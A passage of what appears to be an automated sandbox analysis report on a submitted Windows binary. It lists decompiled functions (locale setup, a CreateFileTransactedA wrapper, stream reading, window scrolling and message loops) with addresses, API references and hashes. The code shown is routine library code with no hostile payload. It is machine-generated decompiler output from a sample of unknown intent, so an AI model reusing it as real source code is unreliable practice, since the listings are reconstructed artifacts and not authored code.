      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID:
      • String ID: Edit
      • API String ID: 0-554135844
      • Opcode ID: 4798439f4f1d3b7228a65b70597ff0adccbd6e10946c6c623ddd4645c1955f76
      • Instruction ID: 0ca9162728bc205cd4d8c60ea4a775246b303c99dac257c934377c3413b35067
      • Opcode Fuzzy Hash: 4798439f4f1d3b7228a65b70597ff0adccbd6e10946c6c623ddd4645c1955f76
      • Instruction Fuzzy Hash: FB11E131300202A7EA205B768EC9FEAB7ADEF83774F148426F102D20A2DF65CC11E661
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 83%
      			E009A20A0(intOrPtr __ecx, void* __edx, void* __edi, char* _a4) {
      				char _v8;
      				char _v16;
      				intOrPtr _v20;
      				char _v32;
      				void* __ebx;
      				void* __esi;
      				signed int _t21;
      				char* _t25;
      				void* _t39;
      				intOrPtr _t41;
      				signed int _t43;
      
      				_t39 = __edi;
      				_push(0xffffffff);
      				_push(0xac7784);
      				_push( *[fs:0x0]);
      				_t21 =  *0xd0c910; // 0x3a0e8b0c
      				_push(_t21 ^ _t43);
      				 *[fs:0x0] =  &_v16;
      				_t41 = __ecx;
      				_v20 = __ecx;
      				E00AC5AED(__ecx, 0);
      				_v8 = 0;
      				 *((intOrPtr*)(__ecx + 4)) = 0;
      				 *((char*)(__ecx + 8)) = 0;
      				 *((intOrPtr*)(__ecx + 0xc)) = 0;
      				 *((char*)(__ecx + 0x10)) = 0;
      				 *((intOrPtr*)(__ecx + 0x14)) = 0;
      				 *((char*)(__ecx + 0x18)) = 0;
      				 *((intOrPtr*)(__ecx + 0x1c)) = 0;
      				 *((char*)(__ecx + 0x20)) = 0;
      				_t25 = _a4;
      				_v8 = 4;
      				_t47 = _t25;
      				if(_t25 == 0) {
      					_a4 = "bad locale name";
      					E00AAAF07( &_v32,  &_a4);
      					_v32 = 0xad6dd0;
      					_t25 = E00AAB8C9( &_v32, 0xb0b09c);
      				}
      				E00AC5D09(0, _t39, _t41, _t47, _t41, _t25);
      				 *[fs:0x0] = _v16;
      				return _t41;
      			}


      0x009a20a0
      0x009a20a3
      0x009a20a5
      0x009a20b0
      0x009a20b6
      0x009a20bd
      0x009a20c1
      0x009a20c7
      0x009a20c9
      0x009a20cf
      0x009a20d4
      0x009a20d7
      0x009a20da
      0x009a20dd
      0x009a20e0
      0x009a20e3
      0x009a20e6
      0x009a20e9
      0x009a20ec
      0x009a20ef
      0x009a20f2
      0x009a20f6
      0x009a20f8
      0x009a2101
      0x009a2108
      0x009a2116
      0x009a211d
      0x009a211d
      0x009a2124
      0x009a2131
      0x009a213e

      APIs
      • std::_Lockit::_Lockit.LIBCPMT ref: 009A20CF
      • std::exception::exception.LIBCMT ref: 009A2108
        • Part of subcall function 00AAAF07: std::exception::_Copy_str.LIBCMT ref: 00AAAF22
      • __CxxThrowException@8.LIBCMT ref: 009A211D
        • Part of subcall function 00AAB8C9: RaiseException.KERNEL32(?,?,009A1977,?,?,?,?,?,009A1977,?,00B0B024,00000000), ref: 00AAB90B
      • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 009A2124
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: std::_$Copy_strExceptionException@8Locinfo::_Locinfo_ctorLockitLockit::_RaiseThrowstd::exception::_std::exception::exception
      • String ID: bad locale name
      • API String ID: 73090415-1405518554
      • Opcode ID: 3b2611f95c014edd914ffd43fd94d8ced3bdf39a59a0becdbe73e46abd161b14
      • Instruction ID: a2c6141bbb3017277bcf4581974a80542b1c319f6fc3b89666e9fa2425ba720c
      • Opcode Fuzzy Hash: 3b2611f95c014edd914ffd43fd94d8ced3bdf39a59a0becdbe73e46abd161b14
      • Instruction Fuzzy Hash: 4611B2B1904B48AFC711DF69D880A9AFBF8FB19700F40866EF45693741D774A604CBA5
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 100%
      			E009C83CA(intOrPtr* __ecx, CHAR* _a4, long _a8, long _a12, struct _SECURITY_ATTRIBUTES* _a16, long _a20, long _a24, intOrPtr _a28) {
      				struct HINSTANCE__* _t15;
      				intOrPtr* _t21;
      
      				_t21 = __ecx;
      				if( *__ecx == 0) {
      					if( *((intOrPtr*)(__ecx + 4)) == 0) {
      						L6:
      						return _t15 | 0xffffffff;
      					}
      					return CreateFileA(_a4, _a8, _a12, _a16, _a20, _a24, 0);
      				}
      				_t15 = GetModuleHandleA("kernel32.dll");
      				if(_t15 == 0) {
      					goto L6;
      				}
      				_t15 = GetProcAddress(_t15, "CreateFileTransactedA");
      				if(_t15 == 0) {
      					goto L6;
      				}
      				return _t15->i(_a4, _a8, _a12, _a16, _a20, _a24, _a28,  *_t21, 0, 0);
      			}


      0x009c83d1
      0x009c83d7
      0x009c8418
      0x009c8435
      0x00000000
      0x009c8435
      0x00000000
      0x009c842d
      0x009c83de
      0x009c83e6
      0x00000000
      0x00000000
      0x009c83ee
      0x009c83f6
      0x00000000
      0x00000000
      0x00000000

      APIs
      • GetModuleHandleA.KERNEL32(kernel32.dll,00000000,?,?,009C8FD9,00000000,80000000,00000000,0000000C,00000003,00000080,00000000,?,?,00000000,?), ref: 009C83DE
      • GetProcAddress.KERNEL32(00000000,CreateFileTransactedA), ref: 009C83EE
      • CreateFileA.KERNEL32(?,?,?,00000000,?,?,00000000,00000000,?,?,009C8FD9,00000000,80000000,00000000,0000000C,00000003), ref: 009C842D
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: AddressCreateFileHandleModuleProc
      • String ID: CreateFileTransactedA$kernel32.dll
      • API String ID: 2580138172-3827029016
      • Opcode ID: 06b691966829a306b8c91956669d1eaaa26dfd15a5202602ce1a6fe0e2016838
      • Instruction ID: 966ecf622f9298ed86cf0ee7a33778c7b3d8da16c26b11d729b3b919acc6c9fd
      • Opcode Fuzzy Hash: 06b691966829a306b8c91956669d1eaaa26dfd15a5202602ce1a6fe0e2016838
      • Instruction Fuzzy Hash: 9F01D63240010AFB8F264F95DC08DAB7F2AFB98790B55891AFA6551070DB36C862EB61
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 78%
      			E009A30CD() {
      				intOrPtr _v4;
      				signed int _v8;
      				char _v16;
      				signed int _v20;
      				intOrPtr* _v24;
      				intOrPtr _v28;
      				signed int _v32;
      				signed int _v48;
      				signed int _v49;
      				char _v56;
      				char _v60;
      				void* __ebx;
      				void* __edi;
      				void* __esi;
      				void* _t75;
      				signed int _t78;
      				signed int _t79;
      				signed char _t82;
      				void* _t85;
      				signed int* _t87;
      				signed int _t90;
      				signed int* _t94;
      				signed int _t97;
      				signed char* _t103;
      				void* _t105;
      				void* _t106;
      				signed int _t113;
      				signed int _t114;
      				intOrPtr* _t119;
      				char _t126;
      				signed int* _t137;
      				void* _t140;
      				signed int* _t143;
      				signed int _t145;
      				signed int _t147;
      				void* _t148;
      				signed char** _t152;
      				signed int _t154;
      				signed int _t156;
      				void* _t157;
      				void* _t159;
      
      				_t75 =  *((intOrPtr*)( *_v24 + 4)) + _v24;
      				_t113 =  *(_t75 + 0xc) | 0x00000004;
      				if( *((intOrPtr*)(_t75 + 0x38)) == 0) {
      					_t113 = _t113 | 0x00000004;
      				}
      				_t114 = _t113 & 0x00000017;
      				 *(_t75 + 0xc) = _t114;
      				if(( *(_t75 + 0x10) & _t114) != 0) {
      					E00AAB8C9(0, 0);
      					asm("int3");
      					asm("int3");
      					asm("int3");
      					asm("int3");
      					asm("int3");
      					asm("int3");
      					asm("int3");
      					asm("int3");
      					asm("int3");
      					asm("int3");
      					_t154 = _t156;
      					_push(0xffffffff);
      					_push(0xac79f8);
      					_push( *[fs:0x0]);
      					_t157 = _t156 - 0x2c;
      					_t78 =  *0xd0c910; // 0x3a0e8b0c
      					_t79 = _t78 ^ _t154;
      					_v20 = _t79;
      					_push(_t105);
      					_push(_t79);
      					 *[fs:0x0] =  &_v16;
      					_t147 = _t114;
      					_t82 =  *( *(_t147 + 0x20));
      					_t136 = 0;
      					__eflags = _t82;
      					if(_t82 == 0) {
      						L8:
      						__eflags =  *(_t147 + 0x54) - _t136;
      						if( *(_t147 + 0x54) == _t136) {
      							L30:
      							_t83 = _t82 | 0xffffffff;
      							__eflags = _t82 | 0xffffffff;
      						} else {
      							_t119 =  *((intOrPtr*)(_t147 + 0x10));
      							_t141 = _t147 + 0x48;
      							__eflags =  *_t119 - _t147 + 0x48;
      							if( *_t119 == _t147 + 0x48) {
      								_t141 =  *((intOrPtr*)(_t147 + 0x3c));
      								 *_t119 =  *((intOrPtr*)(_t147 + 0x3c));
      								 *( *(_t147 + 0x20)) =  *(_t147 + 0x40);
      								__eflags = 0;
      								 *((intOrPtr*)( *((intOrPtr*)(_t147 + 0x30)))) = 0;
      							}
      							__eflags =  *((intOrPtr*)(_t147 + 0x44)) - _t136;
      							if(__eflags != 0) {
      								_v28 = 0xf;
      								_v32 = _t136;
      								_v48 = _t136;
      								_v8 = _t136;
      								_t136 =  *(_t147 + 0x54);
      								_push( *(_t147 + 0x54));
      								_t85 = E00AABC81(_t105, _t141, _t147, __eflags);
      								_t159 = _t157 + 4;
      								__eflags = _t85 - 0xffffffff;
      								if(_t85 == 0xffffffff) {
      									L29:
      									_t82 = E009A27D0( &_v48);
      									goto L30;
      								} else {
      									while(1) {
      										E009A2E10( &_v48, 1, _t85);
      										_t87 = _v48;
      										_t137 = _t87;
      										__eflags = _v28 - 0x10;
      										if(_v28 < 0x10) {
      											_t137 =  &_v48;
      											_t87 = _t137;
      										}
      										_t136 = _t137 + _v32;
      										_t142 =  *((intOrPtr*)( *((intOrPtr*)(_t147 + 0x44))));
      										_t110 =  &_v56;
      										_t90 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t147 + 0x44)))) + 0x10))))(_t147 + 0x4c, _t87, _t137 + _v32,  &_v56,  &_v49,  &_v48,  &_v60);
      										__eflags = _t90;
      										if(_t90 < 0) {
      											goto L29;
      										}
      										__eflags = _t90 - 1;
      										if(_t90 <= 1) {
      											__eflags = _v60 -  &_v49;
      											if(_v60 !=  &_v49) {
      												__eflags = _v28 - 0x10;
      												_t143 = _v48;
      												if(_v28 < 0x10) {
      													_t143 =  &_v48;
      												}
      												_t145 = _t143 - _v56 + _v32;
      												__eflags = _t145;
      												while(__eflags > 0) {
      													_t136 =  *(_t147 + 0x54);
      													_t126 =  *((char*)(_t145 + _v56 - 1));
      													_t145 = _t145 - 1;
      													_push( *(_t147 + 0x54));
      													_push(_t126);
      													E00AABF54(_t110, _t145, _t147, __eflags);
      													_t159 = _t159 + 8;
      													__eflags = _t145;
      												}
      												E009A27D0( &_v48);
      												_t83 = _v49 & 0x000000ff;
      											} else {
      												__eflags = _v28 - 0x10;
      												_t94 = _v48;
      												if(_v28 < 0x10) {
      													_t94 =  &_v48;
      												}
      												_t136 = _v56 - _t94;
      												__eflags = _v56 - _t94;
      												E009A29E0( &_v48, 0, _v56 - _t94);
      												goto L28;
      											}
      										} else {
      											__eflags = _t90 - 3;
      											if(_t90 != 3) {
      												goto L29;
      											} else {
      												__eflags = _v32 - 1;
      												if(__eflags < 0) {
      													L28:
      													_push( *(_t147 + 0x54));
      													_t85 = E00AABC81(_t110, _t142, _t147, __eflags);
      													_t159 = _t159 + 4;
      													__eflags = _t85 - 0xffffffff;
      													if(_t85 != 0xffffffff) {
      														continue;
      													} else {
      														goto L29;
      													}
      												} else {
      													__eflags = _v28 - 0x10;
      													_t97 = _v48;
      													if(_v28 < 0x10) {
      														_t97 =  &_v48;
      													}
      													E00AAC44E( &_v49, 1, _t97, 1);
      													E009A27D0( &_v48);
      													_t83 = _v49 & 0x000000ff;
      												}
      											}
      										}
      										goto L31;
      									}
      									goto L29;
      								}
      							} else {
      								_push( *(_t147 + 0x54));
      								_t82 = E00AABC81(_t105, _t141,  *(_t147 + 0x54), __eflags);
      								__eflags = _t82 - 0xffffffff;
      								if(_t82 == 0xffffffff) {
      									goto L30;
      								} else {
      									_t83 = _t82 & 0x000000ff;
      								}
      							}
      						}
      					} else {
      						_t82 =  *( *(_t147 + 0x20));
      						__eflags = _t82 -  *((intOrPtr*)( *((intOrPtr*)(_t147 + 0x30)))) + _t82;
      						if(_t82 >=  *((intOrPtr*)( *((intOrPtr*)(_t147 + 0x30)))) + _t82) {
      							goto L8;
      						} else {
      							 *((intOrPtr*)( *((intOrPtr*)(_t147 + 0x30)))) =  *((intOrPtr*)( *((intOrPtr*)(_t147 + 0x30)))) - 1;
      							_t152 =  *(_t147 + 0x20);
      							_t103 =  *_t152;
      							_t136 =  &(_t103[1]);
      							 *_t152 =  &(_t103[1]);
      							_t83 =  *_t103 & 0x000000ff;
      						}
      					}
      					L31:
      					 *[fs:0x0] = _v16;
      					_pop(_t140);
      					_pop(_t148);
      					_pop(_t106);
      					__eflags = _v20 ^ _t154;
      					return E00AAB46A(_t83, _t106, _v20 ^ _t154, _t136, _t140, _t148);
      				} else {
      					_v4 = 1;
      					return E009A30FE;
      				}
      			}


      0x009a30d5
      0x009a30da
      0x009a30e1
      0x009a30e3
      0x009a30e3
      0x009a30e6
      0x009a30e9
      0x009a30ef
      0x009a3171
      0x009a3176
      0x009a3177
      0x009a3178
      0x009a3179
      0x009a317a
      0x009a317b
      0x009a317c
      0x009a317d
      0x009a317e
      0x009a317f
      0x009a3181
      0x009a3183
      0x009a3185
      0x009a3190
      0x009a3191
      0x009a3194
      0x009a3199
      0x009a319b
      0x009a319e
      0x009a31a1
      0x009a31a5
      0x009a31ab
      0x009a31b0
      0x009a31b2
      0x009a31b4
      0x009a31b6
      0x009a31df
      0x009a31df
      0x009a31e2
      0x009a330f
      0x009a330f
      0x009a330f
      0x009a31e8
      0x009a31e8
      0x009a31eb
      0x009a31ee
      0x009a31f0
      0x009a31f5
      0x009a31f8
      0x009a31fd
      0x009a3202
      0x009a3204
      0x009a3204
      0x009a3206
      0x009a3209
      0x009a3228
      0x009a322f
      0x009a3232
      0x009a3235
      0x009a3238
      0x009a323b
      0x009a323c
      0x009a3241
      0x009a3244
      0x009a3247
      0x009a3307
      0x009a330a
      0x00000000
      0x009a324d
      0x009a324d
      0x009a3253
      0x009a325b
      0x009a325e
      0x009a3260
      0x009a3263
      0x009a3265
      0x009a3268
      0x009a3268
      0x009a326a
      0x009a3270
      0x009a327e
      0x009a328b
      0x009a328d
      0x009a328f
      0x00000000
      0x00000000
      0x009a3291
      0x009a3294
      0x009a32d1
      0x009a32d4
      0x009a332e
      0x009a3332
      0x009a3335
      0x009a3337
      0x009a3337
      0x009a333d
      0x009a3340
      0x009a3342
      0x009a3347
      0x009a334a
      0x009a334f
      0x009a3350
      0x009a3351
      0x009a3352
      0x009a3357
      0x009a335a
      0x009a335a
      0x009a3365
      0x009a336a
      0x009a32d6
      0x009a32d6
      0x009a32da
      0x009a32dd
      0x009a32df
      0x009a32df
      0x009a32e5
      0x009a32e5
      0x009a32ed
      0x00000000
      0x009a32ed
      0x009a3296
      0x009a3296
      0x009a3299
      0x00000000
      0x009a329b
      0x009a329b
      0x009a329f
      0x009a32f2
      0x009a32f5
      0x009a32f6
      0x009a32fb
      0x009a32fe
      0x009a3301
      0x00000000
      0x00000000
      0x00000000
      0x00000000
      0x009a32a1
      0x009a32a1
      0x009a32a5
      0x009a32a8
      0x009a32aa
      0x009a32aa
      0x009a32b6
      0x009a32c5
      0x009a32ca
      0x009a32ca
      0x009a329f
      0x009a3299
      0x00000000
      0x009a3294
      0x00000000
      0x009a324d
      0x009a320b
      0x009a320e
      0x009a320f
      0x009a3217
      0x009a321a
      0x00000000
      0x009a3220
      0x009a3220
      0x009a3220
      0x009a321a
      0x009a3209
      0x009a31b8
      0x009a31bb
      0x009a31c4
      0x009a31c6
      0x00000000
      0x009a31c8
      0x009a31cb
      0x009a31cd
      0x009a31d0
      0x009a31d2
      0x009a31d5
      0x009a31d7
      0x009a31d7
      0x009a31c6
      0x009a3312
      0x009a3315
      0x009a331d
      0x009a331e
      0x009a331f
      0x009a3323
      0x009a332d
      0x009a30f1
      0x009a30f1
      0x009a30fd
      0x009a30fd

      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: 6aedb38ef9cf2e9c5bafa74a8d2b17660ebf4bb3cf6a4e74d15b8ef21cec2c65
      • Instruction ID: 97d9aa98ad1a28ac7274a18f211f6c582542d6b38dde3f1f1092e98b1b223580
      • Opcode Fuzzy Hash: 6aedb38ef9cf2e9c5bafa74a8d2b17660ebf4bb3cf6a4e74d15b8ef21cec2c65
      • Instruction Fuzzy Hash: 7F718171A046089FCB24CFACC881AAEB7B5FF4A314F508919F456A7691DB31FA04CF90
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 67%
      			E009ABEBE(intOrPtr* __ecx, void* __edx, int _a4, int _a8, RECT* _a12, struct HWND__* _a16) {
      				signed int _v8;
      				struct tagRECT _v24;
      				RECT* _v28;
      				void* __ebx;
      				void* __edi;
      				void* __esi;
      				signed int _t29;
      				struct HWND__* _t45;
      				void* _t51;
      				intOrPtr* _t53;
      				signed int _t54;
      
      				_t51 = __edx;
      				_t29 =  *0xd0c910; // 0x3a0e8b0c
      				_v8 = _t29 ^ _t54;
      				_t45 = _a16;
      				_t53 = __ecx;
      				_v28 = _a12;
      				if(IsWindowVisible( *(__ecx + 0x20)) != 0 || _v28 != 0 || _t45 != 0) {
      					_t33 = ScrollWindow( *(_t53 + 0x20), _a4, _a8, _v28, _t45);
      				} else {
      					_push(5);
      					_push( *(_t53 + 0x20));
      					while(1) {
      						_t45 = GetWindow();
      						if(_t45 == 0) {
      							break;
      						}
      						_v24.left = 0;
      						_v24.top = 0;
      						_v24.right = 0;
      						_v24.bottom = 0;
      						GetWindowRect(_t45,  &_v24);
      						E009BAAA3(_t53,  &_v24);
      						SetWindowPos(_t45, 0, _v24.left + _a4, _v24.top + _a8, 0, 0, 0x15);
      						_push(2);
      						_push(_t45);
      					}
      				}
      				if( *((intOrPtr*)(_t53 + 0x68)) != 0 && _v28 == 0) {
      					_t53 =  *((intOrPtr*)(_t53 + 0x68));
      					_t33 =  *((intOrPtr*)( *_t53 + 0x5c))(_a4, _a8);
      				}
      				return E00AAB46A(_t33, _t45, _v8 ^ _t54, _t51, 0, _t53);
      			}

      0x009abebe
      0x009abec6
      0x009abecd
      0x009abed4
      0x009abed9
      0x009abede
      0x009abeeb
      0x009abf57
      0x009abef6
      0x009abef6
      0x009abef8
      0x009abf3c
      0x009abf42
      0x009abf46
      0x00000000
      0x00000000
      0x009abf02
      0x009abf05
      0x009abf08
      0x009abf0b
      0x009abf0e
      0x009abf1a
      0x009abf33
      0x009abf39
      0x009abf3b
      0x009abf3b
      0x009abf48
      0x009abf60
      0x009abf6a
      0x009abf74
      0x009abf74
      0x009abf85

      APIs
      • IsWindowVisible.USER32(?), ref: 009ABEE1
      • GetWindowRect.USER32 ref: 009ABF0E
      • SetWindowPos.USER32(00000000,00000000,?,?,00000000,00000000,00000015,?), ref: 009ABF33
      • GetWindow.USER32(?,00000005), ref: 009ABF3C
      • ScrollWindow.USER32 ref: 009ABF57
      Yara matches
      Similarity
      • API ID: Window$RectScrollVisible
      • String ID:
      • API String ID: 2639402888-0
      • Opcode ID: 3aa3549634c938cb1f1fb5b645e19dfeb295df7b747692443c6cd11675b281ff
      • Instruction ID: a09110832651544d15c29c58e5d8a0fa3181818c7b4cc31457c4de7d88a9aead
      • Opcode Fuzzy Hash: 3aa3549634c938cb1f1fb5b645e19dfeb295df7b747692443c6cd11675b281ff
      • Instruction Fuzzy Hash: D6214B72900209EFCF11DFA5CC89DAEBBB9FF89310F14441AF546A2212D7719A50DFA0
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 97%
      			E009ADA0E(signed int __ebx, signed int __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
      				struct HWND__* _t29;
      				signed int _t32;
      				signed int _t36;
      				signed int _t38;
      				struct HWND__* _t54;
      				void* _t55;
      				void* _t56;
      
      				_t56 = __eflags;
      				_t49 = __edx;
      				_t42 = __ebx;
      				_push(0xa0);
      				E00AAD232(0xac806b, __ebx, __edi, __esi);
      				 *(_t55 - 0x10) = __ecx;
      				E009B056D(_t55 - 0x38);
      				_t45 = _t55 - 0xac;
      				E009AB862(_t55 - 0xac, __edx, _t56);
      				 *(_t55 - 4) = 0;
      				_t29 = GetTopWindow( *(__ecx + 0x20));
      				while(1) {
      					_t54 = _t29;
      					if(_t54 == 0) {
      						break;
      					}
      					 *(_t55 - 0x8c) = _t54;
      					 *((intOrPtr*)(_t55 - 0x34)) = GetDlgCtrlID(_t54);
      					 *((intOrPtr*)(_t55 - 0x24)) = _t55 - 0xac;
      					_t32 = E009AC937(_t42, _t45, _t49, 0, _t54, __eflags, _t54);
      					__eflags = _t32;
      					if(_t32 == 0) {
      						L3:
      						_t45 =  *(_t55 - 0x10);
      						__eflags = E009B03EE( *(_t55 - 0x10), 0, _t54,  *((intOrPtr*)(_t55 - 0x34)), 0xffffffff, _t55 - 0x38, 0);
      						if(__eflags == 0) {
      							_t42 =  *(_t55 + 0xc);
      							__eflags = _t42;
      							if(_t42 != 0) {
      								_t36 = SendMessageA( *(_t55 - 0x8c), 0x87, 0, 0);
      								__eflags = _t36 & 0x00002000;
      								if((_t36 & 0x00002000) == 0) {
      									L10:
      									_t42 = 0;
      									__eflags = 0;
      								} else {
      									_t38 = E009B0A7A(_t55 - 0xac) & 0x0000000f;
      									__eflags = _t38 - 3;
      									if(_t38 == 3) {
      										goto L10;
      									} else {
      										__eflags = _t38 - 6;
      										if(_t38 == 6) {
      											goto L10;
      										} else {
      											__eflags = _t38 - 7;
      											if(_t38 == 7) {
      												goto L10;
      											} else {
      												__eflags = _t38 - 9;
      												if(_t38 == 9) {
      													goto L10;
      												}
      											}
      										}
      									}
      								}
      							}
      							_t45 = _t55 - 0x38;
      							E009B0593(_t55 - 0x38,  *((intOrPtr*)(_t55 + 8)), _t42);
      						}
      					} else {
      						_t45 = _t32;
      						__eflags = E009B03EE(_t32, 0, _t54, 0, 0xbd11ffff, _t55 - 0x38, 0);
      						if(__eflags == 0) {
      							goto L3;
      						}
      					}
      					_t29 = GetWindow(_t54, 2);
      				}
      				_t21 = _t55 - 4;
      				 *(_t55 - 4) =  *(_t55 - 4) | 0xffffffff;
      				 *(_t55 - 0x8c) = 0;
      				return E00AAD30A(E009AD6CC(_t42, _t55 - 0xac, _t49, 0, _t54,  *_t21));
      			}

      0x009ada0e
      0x009ada0e
      0x009ada0e
      0x009ada0e
      0x009ada18
      0x009ada1f
      0x009ada25
      0x009ada2a
      0x009ada30
      0x009ada3a
      0x009ada3d
      0x009adaf1
      0x009adaf1
      0x009adaf5
      0x00000000
      0x00000000
      0x009ada49
      0x009ada55
      0x009ada5f
      0x009ada62
      0x009ada67
      0x009ada69
      0x009ada81
      0x009ada81
      0x009ada93
      0x009ada95
      0x009ada97
      0x009ada9a
      0x009ada9c
      0x009adaab
      0x009adab1
      0x009adab6
      0x009adada
      0x009adada
      0x009adada
      0x009adab8
      0x009adac3
      0x009adac6
      0x009adac9
      0x00000000
      0x009adacb
      0x009adacb
      0x009adace
      0x00000000
      0x009adad0
      0x009adad0
      0x009adad3
      0x00000000
      0x009adad5
      0x009adad5
      0x009adad8
      0x00000000
      0x00000000
      0x009adad8
      0x009adad3
      0x009adace
      0x009adac9
      0x009adab6
      0x009adae0
      0x009adae3
      0x009adae3
      0x009ada6b
      0x009ada76
      0x009ada7d
      0x009ada7f
      0x00000000
      0x00000000
      0x009ada7f
      0x009adaeb
      0x009adaeb
      0x009adafb
      0x009adafb
      0x009adb05
      0x009adb15

      APIs
      Yara matches
      Similarity
      • API ID: Window$CtrlH_prolog3MessageSend
      • String ID:
      • API String ID: 849854284-0
      • Opcode ID: 78649379a3463eb3544cd2344868c35cca5bad3ac3a575101081f0b0fdb9cea7
      • Instruction ID: fe85f0ec31d3e27b1220e9633717f3d176a18feba0d485eff6385b31a9ae9958
      • Opcode Fuzzy Hash: 78649379a3463eb3544cd2344868c35cca5bad3ac3a575101081f0b0fdb9cea7
      • Instruction Fuzzy Hash: 9121A271902218AEDF24EBA4DD84FEEBA78FF96310F104259F453A2490EB704E40CBA0
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 68%
      			E009A6EE5(void* __ecx, unsigned int _a4) {
      				void* __ebp;
      				struct HWND__* _t20;
      				void* _t23;
      				void* _t27;
      				void* _t34;
      				struct HWND__* _t35;
      
      				_t28 = __ecx;
      				_t34 = __ecx;
      				if((E009B0A7A(__ecx) & 0x40000000) == 0) {
      					_t28 = __ecx;
      					_t27 = E009AD852(__ecx);
      				} else {
      					_t27 = __ecx;
      				}
      				if(_t27 == 0) {
      					E009B8782(_t28);
      				}
      				if((_a4 & 0x0000000c) != 0) {
      					_t23 = E009B0BF8(_t27);
      					if(( !(_a4 >> 3) & 0x00000001) == 0 || _t23 == 0 || _t27 == _t34) {
      						SendMessageA( *(_t27 + 0x20), 0x86, 0, 0);
      					} else {
      						 *(_t34 + 0x58) =  *(_t34 + 0x58) | 0x00000200;
      						SendMessageA( *(_t27 + 0x20), 0x86, 1, 0);
      						 *(_t34 + 0x58) =  *(_t34 + 0x58) & 0xfffffdff;
      					}
      				}
      				_push(5);
      				_push(GetDesktopWindow());
      				while(1) {
      					_t20 = GetWindow();
      					_t35 = _t20;
      					if(_t35 == 0) {
      						break;
      					}
      					if(E009A64A1( *(_t27 + 0x20), _t35) != 0) {
      						SendMessageA(_t35, 0x36d, _a4, 0);
      					}
      					_push(2);
      					_push(_t35);
      				}
      				return _t20;
      			}

      0x009a6ee5
      0x009a6eed
      0x009a6ef9
      0x009a6eff
      0x009a6f06
      0x009a6efb
      0x009a6efb
      0x009a6efb
      0x009a6f0a
      0x009a6f0c
      0x009a6f0c
      0x009a6f1b
      0x009a6f1f
      0x009a6f2f
